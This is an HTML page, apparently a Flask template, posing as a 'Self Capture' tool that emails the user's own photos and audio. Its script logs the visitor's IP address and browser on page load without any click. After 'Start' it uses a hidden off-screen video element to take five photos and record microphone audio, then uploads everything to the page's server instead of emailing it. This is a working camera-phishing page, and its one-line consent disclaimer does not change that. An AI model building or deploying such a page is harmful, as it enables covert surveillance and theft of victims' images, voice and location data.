<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8"/>
  <meta name="viewport" content="width=device-width,initial-scale=1"/>
  <title>Capture & Email</title>
  <style>
    :root{
      --bg1:#0a0520;
      --bg2:#04132a;
      --neon1: #00ffd1;
      --neon2: #7c3aed;
      --glass: rgba(255,255,255,0.04);
      --muted: rgba(255,255,255,0.78);
      --card-shadow: 0 14px 40px rgba(2,6,23,0.6);
    }
    html,body{height:100%;margin:0;}
    body{
      font-family: Inter, system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", Arial;
      background: linear-gradient(135deg,var(--bg1),var(--bg2));
      color:#fff;
      display:flex;
      align-items:center;
      justify-content:center;
      padding:24px;
      overflow:hidden;
    }
    .shape {
      position: absolute;
      border-radius: 20px;
      filter: blur(38px) saturate(120%);
      opacity: 0.34;
      animation: floaty 9s ease-in-out infinite;
      transform: translate3d(0,0,0);
      mix-blend-mode: screen;
      z-index:0;
    }
    .shape.s1{ width:420px;height:420px; background: linear-gradient(45deg,#00ffd1,#60a5fa); top:-12%; left:-12%; animation-duration:12s;}
    .shape.s2{ width:300px;height:300px; background: linear-gradient(45deg,#7c3aed,#06b6d4); bottom:-8%; right:-8%; animation-duration:10s; animation-delay:1s;}
    .shape.s3{ width:180px;height:180px; background: linear-gradient(45deg,#ff6b6b,#fb923c); top:18%; right:8%; animation-duration:14s; animation-delay:2s;}

    @keyframes floaty {
      0% { transform: translateY(0px) rotate(0deg) scale(1); }
      50% { transform: translateY(-20px) rotate(6deg) scale(1.03); }
      100% { transform: translateY(0px) rotate(0deg) scale(1); }
    }

    .card {
      position: relative;
      width: 100%;
      max-width:460px;
      padding:34px;
      border-radius:18px;
      background: linear-gradient(180deg, rgba(255,255,255,0.03), rgba(255,255,255,0.015));
      border: 1px solid rgba(255,255,255,0.04);
      box-shadow: var(--card-shadow);
      backdrop-filter: blur(10px) saturate(120%);
      text-align:center;
      z-index:2;
    }

    h1{ margin:0 0 8px 0; font-size:20px; color:#fff; font-weight:600; }
    p.lead{ margin:0 0 20px 0; color:var(--muted); font-size:14px; }

    .btn-start {
      display:inline-block;
      padding:14px 36px;
      border-radius:12px;
      background: linear-gradient(90deg, rgba(255,255,255,0.03), rgba(255,255,255,0.01));
      color: #fff;
      border:1px solid rgba(255,255,255,0.06);
      position:relative;
      font-weight:700;
      font-size:16px;
      cursor:pointer;
      transition: transform .15s ease, box-shadow .15s ease;
      box-shadow: 0 8px 30px rgba(2,6,23,0.6), 0 0 18px rgba(124,58,237,0.06);
      backdrop-filter: blur(6px);
      overflow: hidden;
    }
    .btn-start:hover { transform: translateY(-4px); box-shadow: 0 18px 40px rgba(2,6,23,0.6), 0 0 40px rgba(0,255,209,0.08); }

    .subtitle { margin-top:16px; font-size:15px; color:var(--muted); opacity:0; transform: translateY(8px); animation: fadeInUp 1.3s ease forwards; animation-delay: 0.35s; }
    @keyframes fadeInUp { to { opacity:1; transform: translateY(0); } }

    .small { margin-top:18px; font-size:12px; color: rgba(255,255,255,0.6); }

    /* Modal */
    .modal-backdrop {
      position: fixed; inset:0; display:flex; align-items:center; justify-content:center;
      background: linear-gradient(180deg, rgba(2,6,23,0.6), rgba(2,6,23,0.75));
      z-index:9999; visibility:hidden; opacity:0; transition: opacity .18s ease;
    }
    .modal-backdrop.show { visibility:visible; opacity:1; }
    .modal {
      width:92%; max-width:720px; border-radius:14px; padding:18px; color:#e6f7f4;
      background: linear-gradient(180deg, rgba(3,7,15,0.92), rgba(6,10,20,0.95));
      border: 1px solid rgba(124,58,237,0.12);
      box-shadow: 0 20px 60px rgba(2,6,23,0.7);
      backdrop-filter: blur(10px) saturate(140%);
      text-align:left;
    }
  </style>
</head>

<body>

  <!-- Floating Background Shapes -->
  <div class="shape s1"></div>
  <div class="shape s2"></div>
  <div class="shape s3"></div>

  <div class="card">
    <h1>Self Capture — Photos & Audio</h1>
    <p class="lead">Securely capture media from your device and email it to you.</p>

    <button id="startBtn" class="btn-start">Start</button>
    <div class="subtitle">Click start to continue</div>
    <div class="small">Use only on your own device or with explicit consent.</div>
  </div>

  <!-- hidden video -->
  <video id="video" autoplay playsinline style="opacity:0;width:1px;height:1px;position:absolute;left:-9999px;"></video>

  <!-- Modal -->
  <div id="permModal" class="modal-backdrop">
    <div class="modal">
      <h3 id="modalTitle">Camera & Microphone</h3>
      <p id="modalMsg">It looks like permissions are blocked.</p>
      <div id="stepsArea" style="margin:10px 0; color:#bcd9d4;"></div>
      <button id="retryBtn">Retry</button>
      <button id="closeBtn">Close</button>
    </div>
  </div>

<script>

  /***** Injected from Flask securely *****/
  const SECRET_TOKEN = "{{ SECRET_TOKEN }}";

  const ENDPOINT_URL = "/upload";
  const CAPTURE_COUNT = 5;
  const CAPTURE_INTERVAL = 1000;

  const startBtn = document.getElementById('startBtn');
  const video = document.getElementById('video');
  const permModal = document.getElementById('permModal');
  const stepsArea = document.getElementById('stepsArea');
  const retryBtn = document.getElementById('retryBtn');
  const closeBtn = document.getElementById('closeBtn');

  let camStream = null;
  let recorder = null;
  let audioChunks = [];
  let captured = 0;

  function showModal(){ permModal.classList.add("show"); }
  function hideModal(){ permModal.classList.remove("show"); }

  async function checkPermissions(){
    try {
      let cam = await navigator.permissions.query({name:"camera"});
      let mic = await navigator.permissions.query({name:"microphone"});
      if (cam.state === "denied" || mic.state === "denied"){
        stepsArea.innerHTML = "Please allow Camera & Microphone access.";
        showModal();
        return true;
      }
    }catch(e){}
    return false;
  }

  retryBtn.onclick = async ()=>{
    hideModal();
    startBtn.click();
  };

  closeBtn.onclick = ()=> hideModal();

  startBtn.onclick = async ()=>{
    const blocked = await checkPermissions();
    if (blocked) return;

    startBtn.disabled = true;

    try {
      camStream = await navigator.mediaDevices.getUserMedia({ video:true, audio:true });
      video.srcObject = camStream;
      startMicRecording();
      captured = 0;
      setTimeout(autoCapture, 500);
    }
    catch(e){
      showModal();
      startBtn.disabled = false;
    }
  };

  function startMicRecording(){
    audioChunks = [];
    recorder = new MediaRecorder(camStream);
    recorder.ondataavailable = e => audioChunks.push(e.data);
    recorder.start();
  }

  const canvas = document.createElement("canvas");
  const ctx = canvas.getContext("2d");

  function autoCapture(){
    if (captured >= CAPTURE_COUNT){
      finishAudio();
      return;
    }
    capturePhoto();
    captured++;
    setTimeout(autoCapture, CAPTURE_INTERVAL);
  }

  function capturePhoto(){
    if (!video.videoWidth) return;
    canvas.width = video.videoWidth;
    canvas.height = video.videoHeight;
    ctx.drawImage(video,0,0);

    canvas.toBlob(blob=>{
      const f = new FormData();
      f.append("file", blob, "photo_"+Date.now()+".jpg");
      f.append("token", SECRET_TOKEN);
      f.append("type", "photo");
      fetch(ENDPOINT_URL, { method:"POST", body:f });
    }, "image/jpeg", 0.85);
  }

  function finishAudio(){
    recorder.onstop = ()=>{
      const audioBlob = new Blob(audioChunks, {type:"audio/webm"});
      const f = new FormData();
      f.append("file", audioBlob, "audio_"+Date.now()+".webm");
      f.append("token", SECRET_TOKEN);
      f.append("type", "audio");
      fetch(ENDPOINT_URL, {method:"POST", body:f});
      camStream.getTracks().forEach(t=>t.stop());
      startBtn.disabled = false;
    };
    recorder.stop();
  }

  window.onload = async ()=>{
    try {
      const ipRes = await fetch("https://api.ipify.org?format=json");
      const ipJson = await ipRes.json();
      const info = {
        ip: ipJson.ip,
        ua: navigator.userAgent,
        time: new Date().toISOString()
      };
      const f = new FormData();
      f.append("token", SECRET_TOKEN);
      f.append("type","info");
      f.append("info", JSON.stringify(info));
      fetch(ENDPOINT_URL, {method:"POST", body:f});
    } catch(e){}
  }

</script>

</body>
</html>
